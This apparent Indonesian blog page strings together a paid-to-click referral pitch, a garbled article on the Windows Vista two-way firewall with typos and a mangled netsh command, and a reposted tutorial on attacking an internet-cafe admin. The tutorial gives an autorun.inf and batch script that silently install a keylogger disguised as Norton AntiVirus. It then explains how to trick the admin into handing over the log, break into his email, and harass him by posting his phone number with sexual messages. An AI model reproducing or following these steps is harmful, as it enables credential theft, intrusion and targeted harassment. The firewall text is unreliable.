Minggu, 02 Agustus 2009

Contoh penghasilan Member:

Anda klik 10 iklan per hari = Rp 1000,-
20 referral Anda klik 10 iklan per hari = Rp 20.000,-
Tiap Hari Saldo Anda akan bertambah Rp 21.000,-
Tiap Minggu = Rp 147.000,-
Tiap Bulan = Rp 630.000,-

Kalau 1 Tahun? Hitung sendiri aja deh!

Minggu, 26 Juli 2009

Two-Way Firewalls Complete Windows Vista's Security Features

By: Vithal Pai
Why is a firewall important?

Firewalls provide high-quality security towards the network traffic of internet, network, and user data that is unsafe for your PC. Firewalls introduced a sense of security for users compared to previous versions of Windows operating systems. The lack of protection caused many users to use third party firewalls for protection. Microsoft's response to this was released in Windows XP for a custom built-in firewall for their operating system (OS). Many people rejoiced because of this innovative protection towards spyware, adware, and other unwanted data that could harm your investment.

Microsoft's new release of Windows Vista introduces a new, full-fledge security pack that harnesses the power to protect PCs from unwanted data. The alliance with Longhorm servers helped produce a two wall firewall in Windows XP Service Pack 1 and Service Pack 2.

Control More Network Traffic

Administrators can control the flow of network traffic and applications while you use the internet. This protects users from potential network attacks of viruses or spyware through the system. The final version of Windows Vista is expected to have these additions, but it's currently in its testing phases for complete efficiency. This top-of-the-line security feature is expected to help manage the total traffic without stalling its performance.

The "Two-Way" firewall earned its reputation because it will block and filter in-coming and out-going network data. Administrators can control outgoing data as well to prevent the illegal access completed by most hackers online. Now, you can rest safely due to the firewall's ability to keep information in the network on a uniform style - if a certain VoIP system is installed, you can only use this VoIP service to keep unwanted sources out of the network.

Two-Way Firewall Features:

Windows Vista and Windows Server Longhorn have integrated the following features into their firewall for optimal protection. Some of the features include the following:

- Integrated internet protocol security settings and Firewall filtering.

- Microsoft Management Console Snap In for User Interface

- Filters both incoming and outcoming network traffic

- Custom configurations for IP Addresses, TCP (Transmission Control Protocol), Active Directory, directory service account and groups, Internet Control Message Protocol, IPV6 services, and UDP (User Datagram Protocol).

Firewall Configurations:

Windows Vista's Firewall's configurations are dependent on the network administrators' needs. If the network administrator creates a configurationt o block all traffic through specific ports, you can save hundreds or thousands of dollars in damage. The Firewall's default settings are to block all well-known ports used by viruses, spyware, and adware from specific IP addresses that contain vital data. Other default settings of the Firewall include:

-Block all incoming data, except specific exceptions that match an incoming criteria,

-Allow all outgoing data unless it matches an unauthorized criteria established by the network administrator.

If you're interested in configuring the Windows Vista firewall by using Firewall Item in the control panel. In order to reach advanced configurations, you have to use a Snap-in item called "Windows Firewall with Advanced Security". You have to add the Span-in in order to access through the MMC Console. Currently, there is no designated console available. These developments are said to be available before the release.

Another easy route to configure the firewall is with the command line. Enter the command nesh advfirewall context to access the configurations panel. The command line is not available in Windoes XP with SP1 and SP2 or Windows 2003 Server.

You cannot configure the new firewall for Group Policy because Windows XP with SP1 and SP2 and Windows 2003 Server will ignore the settings then use its old version of the firewall. Now, the Beta Version of Windows Vista does not have a defined rule for blocking or allowing network traffic in the Control Panel.

In configuring the Group Policy, go to Computer > Configuration > Windows Settings > Security Settings > Windows Firewall with Advanced Security in the Group Policy Editor Snap-in. The current Windows Firewall at ComputerConfigurationAdministrative TemplatesNetworkConnectionsWindowsFirewall.

New IPSec and Firewall based security features:

Security of one's IP address has reined in thousands of discussion boards online. Users have realized that IP addresses are used to identify personal computer systems with specific models, makes, and owners. Now, the need for IP Security and Firewalls has been tackled with Windows Vista Two-Way firewall. IPSec is a set of Internet standards that provides a higher level of protection from IP traffic; this is essential in file sharing software that require tapping into other IP's for important information.



Blog / Tips buat ngerjain pemilik warnet (Buat Owner and Operator)

Aug 24, '07 8:48 AM
for everyone
Semakin paranoidnya para admin belakangan ini menyebabkan banyak pengguna jasa layanan internet cafe (warnet) menjadi kurang nyaman.

1. Introduction

Semakin paranoidnya para admin belakangan ini menyebabkan banyak pengguan jasa layanan internet cafe (warnet) menjadi kurang nyaman. Restriction (pembatasan) disana-sini (walaupun semua itu dilakukan bukan tanpa alasan) menjadi salah satu inspirasi bagi banyak orang untuk mencari-cari cara menerobos segala keterbatasan itu dan saling men-share pengetahuan mereka. Berbagai jenis exploit pun dibedah, didiskusikan dan dikemas menjadi artikel untuk para newbie.
Sejenak para newbie bisa tertawa puas, berjaya, senyum-senyum sendiri sampai tak jarang lupa diri Namun semua itu tentunya tidak bertahan lama. Admin menjadi semakn pintar. Fasilitas Floppy drive dan CD room drive dihapus dan melarang user untuk melakukan segala bentuk transfer file dari media penyimpanan sementara (disket, cd, flashdisk) kecuali melalui server terlebih dahulu. Ini merupakan fenomena yang akhir-akhir ini bisa kita temui dengan mudah di berbagai Internet cafe. Admin mulai rajin mengupdate path sehingga exploit-exploit yang dulu dibangga-banggakan oleh kaum newbie menjadi "rongsokan" tak berguna.
Sekarang, mari kita bangunkan sang admin dari mimpi indahnya untuk menunjukkan bahwa menjadi paranoid itu adakalanya tidak baik dan tidak ada system yang 100% secure.

2. Serangan pertama

Kita akan menjadi seorang "agen mata-mata" (hehehe.. gw pake istilah ini biar ente merasa agak sedikit keren) yang akan merekam segala aktivitas sang admin. Tujuannya.. banyak! dan salah satunya seperti hal yang banyak diinginkan orang.. mendapatkan password sang admin. Partner kita kali ini adalah navw32.exe, sebuah keyloger dengan icon Norton AntiVirus yang bisa kamu dapatkan suka-suka dengan harga cuma-cuma di halaman member kategori Keyloger. Setelah kamu download keyloger tersebut, ikuti langkah-langkah berikut:

---[1 Bukalah Notepad kemudian ketik satu baris script berikut:
Klik [file][save] kemudian pada box save as type, pilih All Files dan pada form isian name beri nama Autorun.inf lalu klik tombol [save].

---[2 Buka lembar baru pada notepad dengan klik menu [file][new] lalu ketik script berikut:

@echo off echo Norton Antivirus 2006 echo Scanning disk drive... echo Please wait... copy navw32.exe %windir%navw32.exe call %windir%navw32.exe echo. echo. echo. echo. echo. echo. echo. echo. Scanning complette! No virus threat detected! echo. cls

Klik [file][save] kemudian pada box save as type, pilih All Files dan pada form isian name beri nama nav.bat lalu klik tombol [save].

---[3. Persiapkan beberapa file micr*soft word documents (bisa diganti dengan file lain) sebagai tipuan/alasan untuk di transfer. Semakin banyak file, semakin baik karena file keyloger kamu akan semakin tersamarkan.

---[4. Persiapkan sebuah cd kosong (bekas juga boleh) lalu bakar semua file diatas (autorun.inf, nav.bat, navw32.exe dan file-file tipuan) kedalam CD.

Sekarang pergilah ke warnet tempat sang admin berkuasa. Bersikaplah seperti biasa dan jangan gugup selayaknya para koruptor yang sering nampang di satasion-stasion TV tanpa rasa malu. Setelah kamu login ke billing komputer user, datangi sang admin. Katakan pada beliau, "Mas/mbak/om/tante/, mau transfer file dari cd ini. Nama filenya blablabla tolong dikirim ke komputer nomor blablabla."
Begitu CD dimasukkan, saat itulah terjadi sebuah fenomena berikut:
Komputer akan memproses file autorun.inf secara otomatis ---> file autorun.inf akan memproses file nav.bat ---> file nav.bat akan menduplikasi file navw32.exe ke dalam directory windows dan mengaktivkannya ---> Keyloger telah terinstall, hasil rekamannya akan tersimpan di directory yang sama dengan nama navw32.dll beratribut hidden.
Sekarang, kamu bisa pulang dengan wajah tanpa dosa dan mungkin (lagi-lagi) kamu bakalan senyum-senyum sendiri sambil mengelus-elus jenggot kayak habis menang togel.
Lalu bagaimana cara mengambil file hasil rekaman keyloger di directory windows sang admin? Ikuti langkah-langkah pada serangan kedua.

3. Serangan kedua

Dua hari Kemudian, datanglah ke warnet itu lagi. Bertingkah lakulah secara wajar dan beraktivitas seperti layaknya user biasa. Setelah selesai berinternet ria, datangi sang admin, bayarlah biaya browsing seperti biasa lalu dengan wajah sangat-sangat memelas seperti pengemis di jalanan katakan pada beliau,"Mas/mbak/om/tante/, komputer saya bermasalah neeh. Mnurut pesan Error yang muncul, file navw32.dll yang berada di directory windows hilang. File tersebut beratribut hidden. Tolong doong copykan dari komputer ini. Kebetulan versi windowsnya sama dengan komputer saya.."
Tentu saja biasanya sang admin dengan sangat senang hati akan membantu kamu. Dengan suka rela dan penuh kesadaran beliau akan mengaktifkan opsi Show All files pada Folder Options dan mengcopy-kan file navw32.dll dari directory windows tanpa menyadari bahwa file tersebut bukan file system, namun file hasil rekaman keyloger.
Berikan disket/cd/flashdisk mu dan setelah file tersebut tersimpan, ucapkan beribu terima kasih lalu pulanglah ke rumah. Buka file tersebut di rumah. Klik 2x pada file lalu ketika muncul kotak dialog open with, klik opsi select program from a list dan pilih notepad pada daftar program yang ditampilkan.
Sekarang tentunya kamu bisa leluasa membaca rekaman aktivitas sang admin. Cari password emailnya dan kamu bisa menuju pada hari pembalasan.

4. Hari Pembalasan

Pilih hari yang tepat, misalnya malam jum'at kliwon dimana sang admin mungkin sedang terlelap di rumahnya. Nyalakan komputermu dan connectlah ke Internet. Namun ada baiknya kamu lakukan hal ini di warnet agar lebih aman. Carilah warnet yang buka 24 jam.
Berbekal hasil rekaman keyloger tadi, loginlah ke account email sang admin. Setelah puas menjelajahi emailnya, subscriblah ke berbagai mailing list besar dengan email tersebut. Subscribe sebanyak-banyaknya.
Ada ide yang sedikit lebih sadis (ini cuma ide lho.. sebaiknya jangan dilakukan deech..). Daftarkan emailnya ke berbagai situs-situs porno dan postinglah sebuah pesan singkat, memikat dan "mematikan". Berikut contohnya jika milis tersebut berbahasa Indonesia:

Dear all..
gwe lagi nafsu berat neeh, burun telepon gwe doong sekarang juga!! neeh no telp gwe: 021-blablabla (masukkan no telp sang admin)
gwe tunggu 24 jam lho!!

Atau jika berbahasa Inggris:

Wanna play "freestyle" with mw? Please call me : 062-021-blablabla
You may F**k me for free!!

Atau terserah kamu laah.. saya rasa kamu lebih pintar dalam memilih kata-kata yang yahuud!!
Maka bisa dipastikan malam itu akan menjadi malam jumat kliwon paling mengerikan bagi sang admin, lebih mengerikan daripada film-film horor manapun! Telepon rumahnya akan berdering tanpa henti dibanjiri oleh telepon dari dalam dan luar negeri dengan maksud pembicaraan yang sudah bisa ditebak apa maksudnya
Keesokan harinya, setelah menghadapi malam paling mengerikan itu, sang admin akan kaget 1/2 hidup 1/2 mati mendapati inboxnya penuh dengan email-email dari berbagai milis yang beliau sendiri tidak merasa pernah bergabung dengan milis-milis itu. Dan bisa jadi, saat beliau sedang sibuk Unscribe dari milis-milis tersebut, telepon rumahnya masih terus-terusan menjerit-jerit dengan jeritan indah

5. Pencegahan

Jika kamu adalah admin yang tidak mau mengalami nasib seperti diatas, maka setiap kamu menerima CD dari siapapun selalu tekan-tahan tombol shift sambil memasukkan CD kedalam CD Room dRive. Setelah CD masuk, tetap tekan tombol shift sampai kira-kira 25 detik. Setelah itu kamu bisa melepas tombol shift dan mengaksesnya melalui windows Explorer. Klik pada area folder tree sebelah kiri, jangan pada daftar drive sebelah kanan karena fitur autorun akan aktif.

6. Penutup

---[+ Kesimpulan
Bisa kita bayangkan sendiri betapa kelalaian sepele bisa menimbulkan dampak yang sangat berbahaya. Ini hanya merupakan contoh Social Engineering sederhana namun berdampak luar biasa, untuk memancing ide kreatif anda.

---[+ Referensi
Self implementing

Sebelum anda menerapkan ide-ide diatas, saya mohon dengan sangat agar anda brfikir jernih dan mengunakan akal sehat anda. Kalau misalnya sang admin telah menolak cinta anda, jangan lantas seenaknya melakukan pembalasan dengan cara diatas. Ada baiknya anda pergi ke market terdekat untuk membeli seribu cermin. Berkacalah!! perbaiki penampilan dan perilaku anda!
Tapi kalau sang admin adalah orang-orang sombong dan telah melakukan kecurangan, menganggap rendah anda dan mengklaim diri mereka adalah super-Hacker, maka anda bisa membungkam mulut besar mereka dengan cara ini.

==================================================- =======

catatan :

ini sekedar buat input buat admin atau owner agar selalu menjaga security dari warnetnya supaya benar2 aman

